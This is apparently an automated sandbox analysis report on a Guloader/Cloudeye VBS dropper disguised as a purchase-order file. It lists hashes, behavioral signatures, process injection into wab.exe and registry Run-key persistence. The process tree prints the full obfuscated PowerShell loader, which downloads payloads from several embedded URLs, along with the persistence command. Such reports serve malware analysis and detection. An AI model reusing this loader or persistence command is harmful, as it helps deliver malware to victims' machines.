Analysis
- max time kernel: 119s
- max time network: 123s
- platform: windows7_x64
- resource: win7-20240704-en
- resource tags: arch:x64, arch:x86, image:win7-20240704-en, locale:en-us, os:windows7-x64, system
- submitted: 10-07-2024 02:22
Static task
static1
Behavioral task
behavioral1
Sample
New_Order_Sheet_PO N° 08072024-36556_Samples_Specifications_Request_quotations_0000800070002024.vbs
Resource
win7-20240704-en
Behavioral task
behavioral2
Sample
New_Order_Sheet_PO N° 08072024-36556_Samples_Specifications_Request_quotations_0000800070002024.vbs
Resource
win10v2004-20240709-en
General
-
Target
New_Order_Sheet_PO N° 08072024-36556_Samples_Specifications_Request_quotations_0000800070002024.vbs
-
Size
102KB
-
MD5
b7967a2db392f9d8694734c554f06183
-
SHA1
0386c4437465eb5bd4c6a21938e99af3c9f748c7
-
SHA256
e33fda9ea628ee0efe54b54a20a9e6aff7cd64d293f3b67c71f11d3035c17764
-
SHA512
89223646bfb92ccf336c539f82fbab7f4e0cb35aab0779631702319504590947480338443f991500b6e3044d4d3c3cef30b45558f8382fa05e9a780426e1e8e5
-
SSDEEP
3072:h4oGKaBSPReHzR0WAjT28fyxa+CS64B9Ou4rIQCtvvNZ:2t7SPReHd0WoT28faa+CS64mu8IQCtvn
Malware Config
Signatures
-
Guloader, Cloudeye
A shellcode-based downloader first seen in 2020.
-
Blocklisted process makes network request 2 IoCs
Processes: WScript.exe, powershell.exe
flow | pid | process
3 | 2388 | WScript.exe
7 | 2896 | powershell.exe
-
Adds Run key to start application 2 TTPs 1 IoCs
Processes: reg.exe
description | ioc | process
Set value (str) | \REGISTRY\USER\S-1-5-21-3434294380-2554721341-1919518612-1000\Software\Microsoft\Windows\CurrentVersion\Run\Svumpukler = "%Tekstmarkeringens130% -w 1 $Beholdtes=(Get-ItemProperty -Path 'HKCU:\\Darrick\\').Huldre;%Tekstmarkeringens130% ($Beholdtes)" | reg.exe
-
Suspicious use of NtCreateThreadExHideFromDebugger 2 IoCs
Processes: wab.exe
pid | process
2344 | wab.exe
2344 | wab.exe
-
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
Processes: powershell.exe, wab.exe
pid | process
2684 | powershell.exe
2344 | wab.exe
-
Suspicious use of SetThreadContext 1 IoCs
Processes: powershell.exe
description | pid | process | target process
PID 2684 set thread context of 2344 | 2684 | powershell.exe | wab.exe
-
Modifies registry key 1 TTPs 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 3 IoCs
Processes: powershell.exe, powershell.exe
pid | process
2896 | powershell.exe
2684 | powershell.exe
2684 | powershell.exe
-
Suspicious behavior: MapViewOfSection 1 IoCs
Processes: powershell.exe
pid | process
2684 | powershell.exe
-
Suspicious use of AdjustPrivilegeToken 2 IoCs
Processes: powershell.exe, powershell.exe
description | pid | process
Token: SeDebugPrivilege | 2896 | powershell.exe
Token: SeDebugPrivilege | 2684 | powershell.exe
-
Suspicious use of WriteProcessMemory 28 IoCs
Processes: WScript.exe, powershell.exe, powershell.exe, wab.exe, cmd.exe
description | pid | process | target process
PID 2388 wrote to memory of 2896 | 2388 | WScript.exe | powershell.exe (listed 3 times)
PID 2896 wrote to memory of 2820 | 2896 | powershell.exe | cmd.exe (listed 3 times)
PID 2896 wrote to memory of 2684 | 2896 | powershell.exe | powershell.exe (listed 4 times)
PID 2684 wrote to memory of 2368 | 2684 | powershell.exe | cmd.exe (listed 4 times)
PID 2684 wrote to memory of 2344 | 2684 | powershell.exe | wab.exe (listed 6 times)
PID 2344 wrote to memory of 844 | 2344 | wab.exe | cmd.exe (listed 4 times)
PID 844 wrote to memory of 2416 | 844 | cmd.exe | reg.exe (listed 4 times)
Processes
-
C:\Windows\System32\WScript.exe "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\New_Order_Sheet_PO N° 08072024-36556_Samples_Specifications_Request_quotations_0000800070002024.vbs" 1⤵
- Blocklisted process makes network request
- Suspicious use of WriteProcessMemory
PID:2388 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Pariaers Slvfadene Frgemnds Salpetersyrefabrikken205 Blidhedens114 Feriegiros Austerer Unpendant Bestialiteter Polyethers Linkedit Endkkerne Threaded Produktions Keratoconus Cdu Overdredging Thormunds Margenlinier21 Halvkvdet86 varmeslangebekendtgrelsers Flickered Omklamret Chalybeous233 Pariaers Slvfadene Frgemnds Salpetersyrefabrikken205 Blidhedens114 Feriegiros Austerer Unpendant Bestialiteter Polyethers Linkedit Endkkerne Threaded Produktions Keratoconus Cdu Overdredging Thormunds Margenlinier21 Halvkvdet86 varmeslangebekendtgrelsers Flickered Omklamret Chalybeous233';If (${host}.CurrentCulture) {$Ophthalmology++;}Function Irksome244($Albuebenenes){$Loto=$Albuebenenes.Length-$Ophthalmology;$Mytologiernes='SUBsTR';$Mytologiernes+='ing';For( $Tilkbenes=1;$Tilkbenes -lt $Loto;$Tilkbenes+=2){$Pariaers+=$Albuebenenes.$Mytologiernes.Invoke( $Tilkbenes, $Ophthalmology);}$Pariaers;}function lineable($Capito){ & ($Rverbanders) ($Capito);}$Proreptilian=Irksome244 ' M o z i.lFlAaF/N5 ..0 S(CW iOnSd,o,w.s, DNBT P1K0 .P0 ;, ,WFi.n 6 4 ;. .x 6 4 ;s r vK:N1,2 1 .V0G). FG,eNcTk o / 2.0E1,0.0 1 0F1S ,F i r,e f,oYxP/P1 2 1H..0S ';$Avenida=Irksome244 ' UKsVe r,- ACgSeAn tP ';$Blidhedens114=Irksome244 'Hh t.tUp.sU: /./BmLial a nkaAc,eTsA. cUoDm./.S,eLr,o s.a,.,m i.x.>Bh tct p s :B/R/.m o,vDike s mDa,cAk taa,lNk ..cDo mP/ S.eArgo s a,. mfi,x > h t tEp s : /n/DfSiSr s tO4.l oTc.kasum.i t h,sP. cIo .,u k,/KSDe,r oFs a..CmUi xA> hUt tSpU:,/K/ 1,0P3m.C1 9R5 ..2H3A7 .,4,3 /.S eCr o s aP..mPiTxS ';$Torqueses=Irksome244 ' >D ';$Rverbanders=Irksome244 '.iTeux, ';$razoring='Unpendant';$Scribblage = Irksome244 ' e.c h o V%KaHp pAd a tUa %d\BKAu bRi kDc e n.tni m eUt e.r ..GTuaa ,&.&T Ne.c hToM Ct ';lineable (Irksome244 'M$.gFlCoTbDaEl :.IGn,tLe.r f r.e tNtme ds=K(KcVmSd. 
,/.ck $SS.c r iMbSbMlsa gBeG) ');lineable (Irksome244 'L$PgAl oUbTaulA:ISBa.lEp eLtSeVr,sUy rveRf aTbkr i.kSk ednM2A0 5,= $SB,lKiFd h e d,eCnGs 1 1 4b.cs p.l,i,t (.$RT ogrFqru eTs,e sF)L ');lineable (Irksome244 'b[ N.e t.. Sge r v iScDe.P oCiSnStFMFa,n,aHg e,rG],: :FSMe,c uSr.i tGyUP,rMo t o.c oPl P=D B[PNTe,t .aSRe cUuSr i tSyIPOrpo.t oBc.oAlHTmy p eD] : :UT lBsb1R2U ');$Blidhedens114=$Salpetersyrefabrikken205[0];$Carmelite= (Irksome244 'N$ gml oKb a lB:MMIe,t a l ukd l sOe,r.e = NReIwS-.O.b jSe c t ,STy sBt e m .FN eTt .EWFe bUC,lpiSebn t');$Carmelite+=$Interfretted[1];lineable ($Carmelite);lineable (Irksome244 ',$,M eStMaFlRuTdSlDsPe r e,.,HNeWaMd e r s [H$ A v eun ied,aT] =,$SPTrAoMr eFp t iBl,i aPnO ');$Saxten=Irksome244 'B$ M eLtEa l uIdYlis e,r eM.FD oSw nSl.o,a.d F iSlse ( $UBUlTi,dTh.e.dRe n,s,1S1G4 , $ F lDi.c k.eCrMe.d ), ';$Flickered=$Interfretted[0];lineable (Irksome244 ',$,gDlmoabRaSl,:,GCr.a,nAoapAhDyTrseB= (lT eTs,tM-,P a t h P$OFelCi c k e r e dB)N ');while (!$Granophyre) {lineable (Irksome244 ' $Dg l o.b a.l : rMe vKo,l,uGt iRoInssAr.a a dFeAnceZ=P$.tGr,uMe ') ;lineable $Saxten;lineable (Irksome244 '.S t,aErFt.- SSl e,e pr D4, ');lineable (Irksome244 'B$Ug,l.o.bPaLl.: GCr aSnCo p hBy r.e,=S(ATKeJs t -SPSa t hA .$,F,l i.c,kFe.rFeLd,) ') ;lineable (Irksome244 'M$ gSlIoSb a lP: F,rUg,e.mFnPd sS=I$fg,lAoHbNaBll:cSPl v.f.a d.e,n eF+ + %.$FS a l p.eUtSeurTsCyLrOeHf.aHb rBiEkPk.e nS2G0G5..Sc o.uVn t ') ;$Blidhedens114=$Salpetersyrefabrikken205[$Frgemnds];}$Kriminologernes=339584;$Resummoned84=26675;lineable (Irksome244 'M$Mg lMo.b a,lS: B.e,sAt i aBlGi t.e tSeRrA =E GBeAtD-ACMo n.t eEn t O$ FAl i c,k,eNrKe dM ');lineable (Irksome244 'B$ g l oAb,aOlR:DW,a v.e mMe n tW .=. 
U[ S yTs.tReKm .,C o nBv eArNtP]P:.: FPr,oBm BPa sAe 6R4 S t,r isn g (t$SB,eCs tSiCa,l iHt eTt.e.rM) ');lineable (Irksome244 'A$ g l o,bZaFl.:IEVn dFkSkEe rPnFe =, ,[HSSyls tLe mB.STSeSxTt,.PE n,c oBd iSn g ]P:R:PAUSMCUI I .,GBe,tUS t,r,i n.gP(P$ W a.vCe mTe n.t ) ');lineable (Irksome244 '.$ gPlTo bAaJlC:HCQhSoNu,t.=S$,E nMd kTkGe,r,n e ..sSuab s t rUi nEg ( $BKKrNi m iPnSo,lloPgSe,rSn,ePs ,H$ RLe.sHukm m oLnDeKd,8,4 ) ');lineable $Chout;"2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2896 -
C:\Windows\system32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Kubikcentimeter.Gua && echo t" 3⤵
PID:2820
-
C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "<same command line as PID 2896 above>" 3⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2684 -
C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Kubikcentimeter.Gua && echo t" 4⤵
PID:2368
-
C:\Program Files (x86)\windows mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" 4⤵
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of WriteProcessMemory
PID:2344 -
C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Svumpukler" /t REG_EXPAND_SZ /d "%Tekstmarkeringens130% -w 1 $Beholdtes=(Get-ItemProperty -Path 'HKCU:\Darrick\').Huldre;%Tekstmarkeringens130% ($Beholdtes)" 5⤵
- Suspicious use of WriteProcessMemory
PID:844 -
C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Svumpukler" /t REG_EXPAND_SZ /d "%Tekstmarkeringens130% -w 1 $Beholdtes=(Get-ItemProperty -Path 'HKCU:\Darrick\').Huldre;%Tekstmarkeringens130% ($Beholdtes)" 6⤵
- Adds Run key to start application
- Modifies registry key
PID:2416
Network
MITRE ATT&CK Enterprise v15
Downloads
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize: 342B
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\FKT3N48STRF9B36SLAGU.temp
Filesize: 7KB